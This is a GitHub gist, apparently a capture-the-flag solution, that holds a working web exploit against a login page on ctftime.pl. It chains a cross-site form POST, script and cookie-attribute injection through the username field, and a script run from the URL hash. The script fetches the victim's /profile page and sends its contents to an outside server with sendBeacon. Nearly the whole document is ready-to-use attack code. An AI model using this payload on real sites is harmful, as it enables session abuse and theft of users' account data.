Skip to content

Instantly share code, notes, and snippets.

@terjanq
Created November 6, 2022 10:23
Show Gist options
  • Save terjanq/34ef644c4a8f0fde8040c103042421a3 to your computer and use it in GitHub Desktop.
Save terjanq/34ef644c4a8f0fde8040c103042421a3 to your computer and use it in GitHub Desktop.
The Real Monster
<iframe name="xxx"></iframe>
<form method=POST target=xxx action="https://ctftime.pl/login">
<input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'>
<input name="password" value="123">
</form>
<script>
(async () =>{
const sleep = d => new Promise(r=>setTimeout(r,d));
document.forms[0].submit();
const payload = `
fetch('/login', {
headers: {'content-type': 'application/x-www-form-urlencoded'},
method: 'POST',
body: 'password=123&username=terjanq","password":"123"};SameSite=none;Secure;Path=/profile;expires=Thu, 01 Jan 1970 00:00:01 GMT;'
});
setTimeout(()=>{
fetch('/profile').then(e=>e.text()).then(e=>navigator.sendBeacon('https://server', e));
}, 1000);
`;
await sleep(2000);
location = 'https://ctftime.pl/profile#'+escape(payload);
})();
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment